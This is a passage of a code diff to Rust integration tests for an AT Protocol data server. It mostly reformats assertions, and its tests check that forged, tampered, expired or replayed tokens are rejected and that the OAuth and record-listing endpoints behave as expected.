let token = create_custom_jwt(&header, &claims, &key_bytes);
570
634
let result = verify_access_token(&token, &key_bytes);
571
-
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
635
+
assert!(
636
+
result.is_err(),
637
+
"Refresh scope with access token type must be rejected"
638
+
);
572
639
}
573
640
574
641
#[test]
···
586
653
let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
587
654
let unverified_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
588
655
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
589
-
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
656
+
assert_eq!(
657
+
extracted_unsafe, "did:plc:sub",
658
+
"get_did_from_token extracts sub without verification (by design for lookup)"
659
+
);
590
660
}
591
661
592
662
#[test]
···
602
672
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#);
603
673
let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
604
674
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
605
-
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
675
+
assert!(
676
+
get_jti_from_token(&no_jti_token).is_err(),
677
+
"Missing jti should error"
678
+
);
606
679
}
607
680
608
681
#[test]
609
682
fn test_jwt_security_key_from_invalid_bytes_rejected() {
610
-
let invalid_keys: Vec<&[u8]> = vec![
611
-
&[],
612
-
&[0u8; 31],
613
-
&[0u8; 33],
614
-
&[0xFFu8; 32],
615
-
];
683
+
let invalid_keys: Vec<&[u8]> = vec![&[], &[0u8; 31], &[0u8; 33], &[0xFFu8; 32]];
616
684
for key in invalid_keys {
617
685
let result = create_access_token("did:plc:test", key);
618
686
if result.is_ok() {
···
644
712
"scope": SCOPE_ACCESS
645
713
});
646
714
let token1 = create_custom_jwt(&header, &just_expired, &key_bytes);
647
-
assert!(verify_access_token(&token1, &key_bytes).is_err(), "Just expired token must be rejected");
715
+
assert!(
716
+
verify_access_token(&token1, &key_bytes).is_err(),
717
+
"Just expired token must be rejected"
718
+
);
648
719
let expires_exactly_now = json!({
649
720
"iss": did,
650
721
"sub": did,
···
656
727
});
657
728
let token2 = create_custom_jwt(&header, &expires_exactly_now, &key_bytes);
658
729
let result2 = verify_access_token(&token2, &key_bytes);
659
-
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
730
+
assert!(
731
+
result2.is_err() || result2.is_ok(),
732
+
"Token expiring exactly now is a boundary case - either behavior is acceptable"
733
+
);
660
734
}
661
735
662
736
#[test]
···
714
788
.send()
715
789
.await
716
790
.unwrap();
717
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
791
+
assert_eq!(
792
+
res.status(),
793
+
StatusCode::UNAUTHORIZED,
794
+
"Forged session token must be rejected"
795
+
);
718
796
}
719
797
720
798
#[tokio::test]
···
734
812
.send()
735
813
.await
736
814
.unwrap();
737
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
815
+
assert_eq!(
816
+
res.status(),
817
+
StatusCode::UNAUTHORIZED,
818
+
"Tampered/expired token must be rejected"
819
+
);
738
820
}
739
821
740
822
#[tokio::test]
···
755
837
.send()
756
838
.await
757
839
.unwrap();
758
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
840
+
assert_eq!(
841
+
res.status(),
842
+
StatusCode::UNAUTHORIZED,
843
+
"DID-tampered token must be rejected"
844
+
);
759
845
}
760
846
761
847
#[tokio::test]
···
811
897
.send()
812
898
.await
813
899
.unwrap();
814
-
assert_eq!(first_refresh.status(), StatusCode::OK, "First refresh should succeed");
900
+
assert_eq!(
901
+
first_refresh.status(),
902
+
StatusCode::OK,
903
+
"First refresh should succeed"
904
+
);
815
905
let replay_res = http_client
816
906
.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
817
907
.header("Authorization", format!("Bearer {}", refresh_jwt))
818
908
.send()
819
909
.await
820
910
.unwrap();
821
-
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
911
+
assert_eq!(
912
+
replay_res.status(),
913
+
StatusCode::UNAUTHORIZED,
914
+
"Refresh token replay must be rejected"
915
+
);
822
916
}
823
917
824
918
#[tokio::test]
···
832
926
.send()
833
927
.await
834
928
.unwrap();
835
-
assert_eq!(valid_res.status(), StatusCode::OK, "Valid Bearer format should work");
929
+
assert_eq!(
930
+
valid_res.status(),
931
+
StatusCode::OK,
932
+
"Valid Bearer format should work"
933
+
);
836
934
let lowercase_res = http_client
837
935
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
838
936
.header("Authorization", format!("bearer {}", access_jwt))
839
937
.send()
840
938
.await
841
939
.unwrap();
842
-
assert_eq!(lowercase_res.status(), StatusCode::OK, "Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)");
940
+
assert_eq!(
941
+
lowercase_res.status(),
942
+
StatusCode::OK,
943
+
"Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)"
944
+
);
843
945
let basic_res = http_client
844
946
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
845
947
.header("Authorization", format!("Basic {}", access_jwt))
846
948
.send()
847
949
.await
848
950
.unwrap();
849
-
assert_eq!(basic_res.status(), StatusCode::UNAUTHORIZED, "Basic scheme must be rejected");
951
+
assert_eq!(
952
+
basic_res.status(),
953
+
StatusCode::UNAUTHORIZED,
954
+
"Basic scheme must be rejected"
955
+
);
850
956
let no_scheme_res = http_client
851
957
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
852
958
.header("Authorization", &access_jwt)
853
959
.send()
854
960
.await
855
961
.unwrap();
856
-
assert_eq!(no_scheme_res.status(), StatusCode::UNAUTHORIZED, "Missing scheme must be rejected");
962
+
assert_eq!(
963
+
no_scheme_res.status(),
964
+
StatusCode::UNAUTHORIZED,
965
+
"Missing scheme must be rejected"
966
+
);
857
967
let empty_token_res = http_client
858
968
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
859
969
.header("Authorization", "Bearer ")
860
970
.send()
861
971
.await
862
972
.unwrap();
863
-
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
973
+
assert_eq!(
974
+
empty_token_res.status(),
975
+
StatusCode::UNAUTHORIZED,
976
+
"Empty token must be rejected"
977
+
);
864
978
}
865
979
866
980
#[tokio::test]
···
874
988
.send()
875
989
.await
876
990
.unwrap();
877
-
assert_eq!(get_res.status(), StatusCode::OK, "Token should work before logout");
991
+
assert_eq!(
992
+
get_res.status(),
993
+
StatusCode::OK,
994
+
"Token should work before logout"
995
+
);
878
996
let logout_res = http_client
879
997
.post(format!("{}/xrpc/com.atproto.server.deleteSession", url))
880
998
.header("Authorization", format!("Bearer {}", access_jwt))
···
888
1006
.send()
889
1007
.await
890
1008
.unwrap();
891
-
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
1009
+
assert_eq!(
1010
+
after_logout_res.status(),
1011
+
StatusCode::UNAUTHORIZED,
1012
+
"Token must be rejected after logout"
1013
+
);
892
1014
}
893
1015
894
1016
#[tokio::test]
···
910
1032
.send()
911
1033
.await
912
1034
.unwrap();
913
-
assert_eq!(get_res.status(), StatusCode::UNAUTHORIZED, "Deactivated account token must be rejected");
1035
+
assert_eq!(
1036
+
get_res.status(),
1037
+
StatusCode::UNAUTHORIZED,
1038
+
"Deactivated account token must be rejected"
1039
+
);
914
1040
let body: Value = get_res.json().await.unwrap();
915
1041
assert_eq!(body["error"], "AccountDeactivated");
916
1042
}
+129
-37
tests/lifecycle_record.rs
+129
-37
tests/lifecycle_record.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
use chrono::Utc;
3
4
use common::*;
4
5
use helpers::*;
5
-
use chrono::Utc;
6
6
use reqwest::{StatusCode, header};
7
7
use serde_json::{Value, json};
8
8
use std::time::Duration;
···
307
307
.send()
308
308
.await
309
309
.expect("Failed to create profile");
310
-
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile");
310
+
assert_eq!(
311
+
create_res.status(),
312
+
StatusCode::OK,
313
+
"Failed to create profile"
314
+
);
311
315
let create_body: Value = create_res.json().await.unwrap();
312
316
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
313
317
let get_res = client
···
326
330
assert_eq!(get_res.status(), StatusCode::OK);
327
331
let get_body: Value = get_res.json().await.unwrap();
328
332
assert_eq!(get_body["value"]["displayName"], "Test User");
329
-
assert_eq!(get_body["value"]["description"], "A test profile for lifecycle testing");
333
+
assert_eq!(
334
+
get_body["value"]["description"],
335
+
"A test profile for lifecycle testing"
336
+
);
330
337
let update_payload = json!({
331
338
"repo": did,
332
339
"collection": "app.bsky.actor.profile",
···
348
355
.send()
349
356
.await
350
357
.expect("Failed to update profile");
351
-
assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile");
358
+
assert_eq!(
359
+
update_res.status(),
360
+
StatusCode::OK,
361
+
"Failed to update profile"
362
+
);
352
363
let get_updated_res = client
353
364
.get(format!(
354
365
"{}/xrpc/com.atproto.repo.getRecord",
···
371
382
let client = client();
372
383
let (alice_did, alice_jwt) = setup_new_user("alice-thread").await;
373
384
let (bob_did, bob_jwt) = setup_new_user("bob-thread").await;
374
-
let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
385
+
let (root_uri, root_cid) =
386
+
create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
375
387
tokio::time::sleep(Duration::from_millis(100)).await;
376
388
let reply_collection = "app.bsky.feed.post";
377
389
let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis());
···
459
471
.send()
460
472
.await
461
473
.expect("Failed to create nested reply");
462
-
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
474
+
assert_eq!(
475
+
nested_res.status(),
476
+
StatusCode::OK,
477
+
"Failed to create nested reply"
478
+
);
463
479
}
464
480
465
481
#[tokio::test]
···
501
517
.send()
502
518
.await
503
519
.expect("Failed to create profile with blob");
504
-
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile with blob");
520
+
assert_eq!(
521
+
create_res.status(),
522
+
StatusCode::OK,
523
+
"Failed to create profile with blob"
524
+
);
505
525
let get_res = client
506
526
.get(format!(
507
527
"{}/xrpc/com.atproto.repo.getRecord",
···
592
612
.send()
593
613
.await
594
614
.expect("Failed to verify record exists");
595
-
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
615
+
assert_eq!(
616
+
get_res.status(),
617
+
StatusCode::OK,
618
+
"Record should still exist"
619
+
);
596
620
}
597
621
598
622
#[tokio::test]
···
735
759
.await
736
760
.expect("Failed to get updated profile");
737
761
let updated_profile: Value = get_updated_profile.json().await.unwrap();
738
-
assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User");
762
+
assert_eq!(
763
+
updated_profile["value"]["displayName"],
764
+
"Updated Batch User"
765
+
);
739
766
let get_deleted_post = client
740
767
.get(format!(
741
768
"{}/xrpc/com.atproto.repo.getRecord",
···
805
832
"{}/xrpc/com.atproto.repo.listRecords",
806
833
base_url().await
807
834
))
808
-
.query(&[
809
-
("repo", did.as_str()),
810
-
("collection", "app.bsky.feed.post"),
811
-
])
835
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
812
836
.send()
813
837
.await
814
838
.expect("Failed to list records");
···
820
844
.iter()
821
845
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
822
846
.collect();
823
-
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
847
+
assert_eq!(
848
+
rkeys,
849
+
vec!["cccc", "bbbb", "aaaa"],
850
+
"Default order should be DESC (newest first)"
851
+
);
824
852
}
825
853
826
854
#[tokio::test]
···
852
880
.iter()
853
881
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
854
882
.collect();
855
-
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
883
+
assert_eq!(
884
+
rkeys,
885
+
vec!["aaaa", "bbbb", "cccc"],
886
+
"reverse=true should give ASC order (oldest first)"
887
+
);
856
888
}
857
889
858
890
#[tokio::test]
···
860
892
let client = client();
861
893
let (did, jwt) = setup_new_user("list-cursor").await;
862
894
for i in 0..5 {
863
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
895
+
create_post_with_rkey(
896
+
&client,
897
+
&did,
898
+
&jwt,
899
+
&format!("post{:02}", i),
900
+
&format!("Post {}", i),
901
+
)
902
+
.await;
864
903
tokio::time::sleep(Duration::from_millis(50)).await;
865
904
}
866
905
let res = client
···
880
919
let body: Value = res.json().await.unwrap();
881
920
let records = body["records"].as_array().unwrap();
882
921
assert_eq!(records.len(), 2);
883
-
let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
922
+
let cursor = body["cursor"]
923
+
.as_str()
924
+
.expect("Should have cursor with more records");
884
925
let res2 = client
885
926
.get(format!(
886
927
"{}/xrpc/com.atproto.repo.listRecords",
···
905
946
.map(|r| r["uri"].as_str().unwrap())
906
947
.collect();
907
948
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
908
-
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
949
+
assert_eq!(
950
+
all_uris.len(),
951
+
unique_uris.len(),
952
+
"Cursor pagination should not repeat records"
953
+
);
909
954
}
910
955
911
956
#[tokio::test]
···
1008
1053
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1009
1054
.collect();
1010
1055
for rkey in &rkeys {
1011
-
assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey);
1056
+
assert!(
1057
+
*rkey >= "bbbb" && *rkey <= "dddd",
1058
+
"Range should be inclusive, got {}",
1059
+
rkey
1060
+
);
1012
1061
}
1013
-
assert!(!rkeys.is_empty(), "Should have at least some records in range");
1062
+
assert!(
1063
+
!rkeys.is_empty(),
1064
+
"Should have at least some records in range"
1065
+
);
1014
1066
}
1015
1067
1016
1068
#[tokio::test]
···
1018
1070
let client = client();
1019
1071
let (did, jwt) = setup_new_user("list-limit-max").await;
1020
1072
for i in 0..5 {
1021
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
1073
+
create_post_with_rkey(
1074
+
&client,
1075
+
&did,
1076
+
&jwt,
1077
+
&format!("post{:02}", i),
1078
+
&format!("Post {}", i),
1079
+
)
1080
+
.await;
1022
1081
}
1023
1082
let res = client
1024
1083
.get(format!(
···
1072
1131
"{}/xrpc/com.atproto.repo.listRecords",
1073
1132
base_url().await
1074
1133
))
1075
-
.query(&[
1076
-
("repo", did.as_str()),
1077
-
("collection", "app.bsky.feed.post"),
1078
-
])
1134
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
1079
1135
.send()
1080
1136
.await
1081
1137
.expect("Failed to list records");
1082
1138
assert_eq!(res.status(), StatusCode::OK);
1083
1139
let body: Value = res.json().await.unwrap();
1084
1140
let records = body["records"].as_array().unwrap();
1085
-
assert!(records.is_empty(), "Empty collection should return empty array");
1086
-
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1141
+
assert!(
1142
+
records.is_empty(),
1143
+
"Empty collection should return empty array"
1144
+
);
1145
+
assert!(
1146
+
body["cursor"].is_null(),
1147
+
"Empty collection should have no cursor"
1148
+
);
1087
1149
}
1088
1150
1089
1151
#[tokio::test]
···
1091
1153
let client = client();
1092
1154
let (did, jwt) = setup_new_user("list-exact-limit").await;
1093
1155
for i in 0..10 {
1094
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
1156
+
create_post_with_rkey(
1157
+
&client,
1158
+
&did,
1159
+
&jwt,
1160
+
&format!("post{:02}", i),
1161
+
&format!("Post {}", i),
1162
+
)
1163
+
.await;
1095
1164
}
1096
1165
let res = client
1097
1166
.get(format!(
···
1109
1178
assert_eq!(res.status(), StatusCode::OK);
1110
1179
let body: Value = res.json().await.unwrap();
1111
1180
let records = body["records"].as_array().unwrap();
1112
-
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1181
+
assert_eq!(
1182
+
records.len(),
1183
+
5,
1184
+
"Should return exactly 5 records when limit=5"
1185
+
);
1113
1186
}
1114
1187
1115
1188
#[tokio::test]
···
1117
1190
let client = client();
1118
1191
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
1119
1192
for i in 0..3 {
1120
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
1193
+
create_post_with_rkey(
1194
+
&client,
1195
+
&did,
1196
+
&jwt,
1197
+
&format!("post{:02}", i),
1198
+
&format!("Post {}", i),
1199
+
)
1200
+
.await;
1121
1201
}
1122
1202
let res = client
1123
1203
.get(format!(
···
1166
1246
"{}/xrpc/com.atproto.repo.listRecords",
1167
1247
base_url().await
1168
1248
))
1169
-
.query(&[
1170
-
("repo", did.as_str()),
1171
-
("collection", "app.bsky.feed.post"),
1172
-
])
1249
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
1173
1250
.send()
1174
1251
.await
1175
1252
.expect("Failed to list records");
···
1190
1267
let client = client();
1191
1268
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
1192
1269
for i in 0..5 {
1193
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
1270
+
create_post_with_rkey(
1271
+
&client,
1272
+
&did,
1273
+
&jwt,
1274
+
&format!("post{:02}", i),
1275
+
&format!("Post {}", i),
1276
+
)
1277
+
.await;
1194
1278
}
1195
1279
let res = client
1196
1280
.get(format!(
···
1213
1297
.iter()
1214
1298
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1215
1299
.collect();
1216
-
assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
1300
+
assert_eq!(
1301
+
first_rkeys,
1302
+
vec!["post00", "post01"],
1303
+
"First page with reverse should start from oldest"
1304
+
);
1217
1305
if let Some(cursor) = body["cursor"].as_str() {
1218
1306
let res2 = client
1219
1307
.get(format!(
···
1236
1324
.iter()
1237
1325
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
1238
1326
.collect();
1239
-
assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
1327
+
assert_eq!(
1328
+
second_rkeys,
1329
+
vec!["post02", "post03"],
1330
+
"Second page should continue in ASC order"
1331
+
);
1240
1332
}
1241
1333
}
+26
-9
tests/lifecycle_session.rs
+26
-9
tests/lifecycle_session.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
use chrono::Utc;
3
4
use common::*;
4
5
use helpers::*;
5
-
use chrono::Utc;
6
6
use reqwest::StatusCode;
7
7
use serde_json::{Value, json};
8
8
···
168
168
.await
169
169
.expect("Failed reuse attempt");
170
170
assert!(
171
-
reuse_res.status() == StatusCode::UNAUTHORIZED || reuse_res.status() == StatusCode::BAD_REQUEST,
171
+
reuse_res.status() == StatusCode::UNAUTHORIZED
172
+
|| reuse_res.status() == StatusCode::BAD_REQUEST,
172
173
"Old refresh token should be invalid after use"
173
174
);
174
175
}
···
237
238
.send()
238
239
.await
239
240
.expect("Failed to login with app password");
240
-
assert_eq!(login_res.status(), StatusCode::OK, "App password login should work");
241
+
assert_eq!(
242
+
login_res.status(),
243
+
StatusCode::OK,
244
+
"App password login should work"
245
+
);
241
246
let revoke_res = client
242
247
.post(format!(
243
248
"{}/xrpc/com.atproto.server.revokeAppPassword",
···
342
347
.send()
343
348
.await
344
349
.expect("Failed to get post while deactivated");
345
-
assert_eq!(get_post_res.status(), StatusCode::OK, "Records should still be readable");
350
+
assert_eq!(
351
+
get_post_res.status(),
352
+
StatusCode::OK,
353
+
"Records should still be readable"
354
+
);
346
355
let activate_res = client
347
356
.post(format!(
348
357
"{}/xrpc/com.atproto.server.activateAccount",
···
365
374
.expect("Failed to check status after activate");
366
375
assert_eq!(status_after_activate.status(), StatusCode::OK);
367
376
let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
368
-
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
377
+
assert!(
378
+
!new_post_uri.is_empty(),
379
+
"Should be able to post after reactivation"
380
+
);
369
381
}
370
382
371
383
#[tokio::test]
···
415
427
.expect("Failed to request account deletion");
416
428
assert_eq!(res.status(), StatusCode::OK);
417
429
let db_url = get_db_connection_string().await;
418
-
let pool = sqlx::PgPool::connect(&db_url).await.expect("Failed to connect to test DB");
419
-
let row = sqlx::query!("SELECT token, expires_at FROM account_deletion_requests WHERE did = $1", did)
420
-
.fetch_optional(&pool)
430
+
let pool = sqlx::PgPool::connect(&db_url)
421
431
.await
422
-
.expect("Failed to query DB");
432
+
.expect("Failed to connect to test DB");
433
+
let row = sqlx::query!(
434
+
"SELECT token, expires_at FROM account_deletion_requests WHERE did = $1",
435
+
did
436
+
)
437
+
.fetch_optional(&pool)
438
+
.await
439
+
.expect("Failed to query DB");
423
440
assert!(row.is_some(), "Deletion token should exist in DB");
424
441
let row = row.unwrap();
425
442
assert!(!row.token.is_empty(), "Token should not be empty");
+4
-1
tests/moderation.rs
+4
-1
tests/moderation.rs
···
34
34
assert_eq!(report_res.status(), StatusCode::OK);
35
35
let report_body: Value = report_res.json().await.unwrap();
36
36
assert!(report_body["id"].is_number(), "Report should have an ID");
37
-
assert_eq!(report_body["reasonType"], "com.atproto.moderation.defs#reasonSpam");
37
+
assert_eq!(
38
+
report_body["reasonType"],
39
+
"com.atproto.moderation.defs#reasonSpam"
40
+
);
38
41
assert_eq!(report_body["reportedBy"], alice_did);
39
42
let account_report_payload = json!({
40
43
"reasonType": "com.atproto.moderation.defs#reasonOther",
+2
-2
tests/notifications.rs
+2
-2
tests/notifications.rs
···
1
1
mod common;
2
2
use bspds::notifications::{
3
-
enqueue_notification, enqueue_welcome, NewNotification, NotificationChannel,
4
-
NotificationStatus, NotificationType,
3
+
NewNotification, NotificationChannel, NotificationStatus, NotificationType,
4
+
enqueue_notification, enqueue_welcome,
5
5
};
6
6
use sqlx::PgPool;
7
7
+207
-81
tests/oauth.rs
+207
-81
tests/oauth.rs
···
3
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
4
use chrono::Utc;
5
5
use common::{base_url, client, create_account_and_login};
6
-
use reqwest::{redirect, StatusCode};
7
-
use serde_json::{json, Value};
6
+
use reqwest::{StatusCode, redirect};
7
+
use serde_json::{Value, json};
8
8
use sha2::{Digest, Sha256};
9
+
use wiremock::matchers::{method, path};
9
10
use wiremock::{Mock, MockServer, ResponseTemplate};
10
-
use wiremock::matchers::{method, path};
11
11
12
12
fn no_redirect_client() -> reqwest::Client {
13
13
reqwest::Client::builder()
···
105
105
let code_challenge_methods = body["code_challenge_methods_supported"].as_array().unwrap();
106
106
assert!(code_challenge_methods.contains(&json!("S256")));
107
107
assert_eq!(body["require_pushed_authorization_requests"], json!(true));
108
-
let dpop_algs = body["dpop_signing_alg_values_supported"].as_array().unwrap();
108
+
let dpop_algs = body["dpop_signing_alg_values_supported"]
109
+
.as_array()
110
+
.unwrap();
109
111
assert!(dpop_algs.contains(&json!("ES256")));
110
112
}
111
113
#[tokio::test]
···
143
145
.send()
144
146
.await
145
147
.expect("Failed to send PAR request");
146
-
assert_eq!(res.status(), StatusCode::OK, "PAR should succeed: {:?}", res.text().await);
148
+
assert_eq!(
149
+
res.status(),
150
+
StatusCode::CREATED,
151
+
"PAR should succeed: {:?}",
152
+
res.text().await
153
+
);
147
154
let body: Value = client
148
155
.post(format!("{}/oauth/par", url))
149
156
.form(&[
···
211
218
let res = client
212
219
.get(format!("{}/oauth/authorize", url))
213
220
.header("Accept", "application/json")
214
-
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
221
+
.query(&[(
222
+
"request_uri",
223
+
"urn:ietf:params:oauth:request_uri:nonexistent",
224
+
)])
215
225
.send()
216
226
.await
217
227
.expect("Request failed");
···
273
283
.expect("PAR failed");
274
284
let par_status = par_res.status();
275
285
let par_text = par_res.text().await.unwrap_or_default();
276
-
if par_status != StatusCode::OK {
286
+
if par_status != StatusCode::OK && par_status != StatusCode::CREATED {
277
287
panic!("PAR failed with status {}: {}", par_status, par_text);
278
288
}
279
289
let par_body: Value = serde_json::from_str(&par_text).unwrap();
···
296
306
&& auth_status != StatusCode::FOUND
297
307
{
298
308
let auth_text = auth_res.text().await.unwrap_or_default();
299
-
panic!(
300
-
"Expected redirect, got {}: {}",
301
-
auth_status, auth_text
302
-
);
309
+
panic!("Expected redirect, got {}: {}", auth_status, auth_text);
303
310
}
304
-
let location = auth_res.headers().get("location")
311
+
let location = auth_res
312
+
.headers()
313
+
.get("location")
305
314
.expect("No Location header")
306
315
.to_str()
307
316
.unwrap();
308
-
assert!(location.starts_with(redirect_uri), "Redirect to wrong URI: {}", location);
309
-
assert!(location.contains("code="), "No code in redirect: {}", location);
310
-
assert!(location.contains(&format!("state={}", state)), "Wrong state in redirect");
317
+
assert!(
318
+
location.starts_with(redirect_uri),
319
+
"Redirect to wrong URI: {}",
320
+
location
321
+
);
322
+
assert!(
323
+
location.contains("code="),
324
+
"No code in redirect: {}",
325
+
location
326
+
);
327
+
assert!(
328
+
location.contains(&format!("state={}", state)),
329
+
"Wrong state in redirect"
330
+
);
311
331
let code = location
312
332
.split("code=")
313
333
.nth(1)
···
330
350
let token_status = token_res.status();
331
351
let token_text = token_res.text().await.unwrap_or_default();
332
352
if token_status != StatusCode::OK {
333
-
panic!("Token request failed with status {}: {}", token_status, token_text);
353
+
panic!(
354
+
"Token request failed with status {}: {}",
355
+
token_status, token_text
356
+
);
334
357
}
335
358
let token_body: Value = serde_json::from_str(&token_text).unwrap();
336
359
assert!(token_body["access_token"].is_string());
···
389
412
.send()
390
413
.await
391
414
.unwrap();
392
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
393
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
415
+
let location = auth_res
416
+
.headers()
417
+
.get("location")
418
+
.unwrap()
419
+
.to_str()
420
+
.unwrap();
421
+
let code = location
422
+
.split("code=")
423
+
.nth(1)
424
+
.unwrap()
425
+
.split('&')
426
+
.next()
427
+
.unwrap();
394
428
let token_body: Value = http_client
395
429
.post(format!("{}/oauth/token", url))
396
430
.form(&[
···
424
458
assert!(refresh_body["refresh_token"].is_string());
425
459
let new_access_token = refresh_body["access_token"].as_str().unwrap();
426
460
let new_refresh_token = refresh_body["refresh_token"].as_str().unwrap();
427
-
assert_ne!(new_access_token, original_access_token, "Access token should rotate");
428
-
assert_ne!(new_refresh_token, refresh_token, "Refresh token should rotate");
461
+
assert_ne!(
462
+
new_access_token, original_access_token,
463
+
"Access token should rotate"
464
+
);
465
+
assert_ne!(
466
+
new_refresh_token, refresh_token,
467
+
"Refresh token should rotate"
468
+
);
429
469
}
430
470
#[tokio::test]
431
471
async fn test_wrong_credentials_denied() {
···
531
571
.send()
532
572
.await
533
573
.unwrap();
534
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
535
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
574
+
let location = auth_res
575
+
.headers()
576
+
.get("location")
577
+
.unwrap()
578
+
.to_str()
579
+
.unwrap();
580
+
let code = location
581
+
.split("code=")
582
+
.nth(1)
583
+
.unwrap()
584
+
.split('&')
585
+
.next()
586
+
.unwrap();
536
587
let token_body: Value = http_client
537
588
.post(format!("{}/oauth/token", url))
538
589
.form(&[
···
610
661
let res = http_client
611
662
.get(format!("{}/oauth/authorize", url))
612
663
.header("Accept", "application/json")
613
-
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
664
+
.query(&[(
665
+
"request_uri",
666
+
"urn:ietf:params:oauth:request_uri:expired-or-nonexistent",
667
+
)])
614
668
.send()
615
669
.await
616
670
.unwrap();
···
668
722
.send()
669
723
.await
670
724
.unwrap();
671
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
672
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
725
+
let location = auth_res
726
+
.headers()
727
+
.get("location")
728
+
.unwrap()
729
+
.to_str()
730
+
.unwrap();
731
+
let code = location
732
+
.split("code=")
733
+
.nth(1)
734
+
.unwrap()
735
+
.split('&')
736
+
.next()
737
+
.unwrap();
673
738
let token_body: Value = http_client
674
739
.post(format!("{}/oauth/token", url))
675
740
.form(&[
···
762
827
.send()
763
828
.await
764
829
.unwrap();
765
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
766
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
830
+
let location = auth_res
831
+
.headers()
832
+
.get("location")
833
+
.unwrap()
834
+
.to_str()
835
+
.unwrap();
836
+
let code = location
837
+
.split("code=")
838
+
.nth(1)
839
+
.unwrap()
840
+
.split('&')
841
+
.next()
842
+
.unwrap();
767
843
let token_body: Value = http_client
768
844
.post(format!("{}/oauth/token", url))
769
845
.form(&[
···
853
929
auth_res.status().is_redirection(),
854
930
"Should redirect even with special chars in state"
855
931
);
856
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
857
-
assert!(location.contains("state="), "State should be in redirect URL");
932
+
let location = auth_res
933
+
.headers()
934
+
.get("location")
935
+
.unwrap()
936
+
.to_str()
937
+
.unwrap();
938
+
assert!(
939
+
location.contains("state="),
940
+
"State should be in redirect URL"
941
+
);
858
942
let encoded_state = urlencoding::encode(special_state);
859
943
assert!(
